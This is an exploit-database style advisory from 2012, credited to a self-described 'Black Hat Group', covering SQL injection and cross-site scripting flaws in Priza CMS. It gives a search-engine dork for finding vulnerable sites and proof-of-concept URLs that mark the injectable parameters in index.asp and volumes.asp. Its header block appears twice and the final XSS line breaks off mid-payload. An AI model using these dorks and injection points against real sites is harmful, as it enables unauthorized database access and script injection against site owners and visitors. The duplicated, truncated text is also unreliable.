# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:
"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:
"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
[PoC] : /website_path/index.asp?p_id=201&id=[SQLi][PoC] : /website_path/index.asp?page_id=[SQLi][PoC] : /website_path/volumes.asp?id=18
[PoC] : /website_path/index.asp?action=find&page_id=28&string=[Xss]
[PoC] : Http://[victim]/path/index.asp?p_id=201&id=[SQLi]
[PoC] : Http://[victim]/path/index.asp?action=find&page_id=28&string=">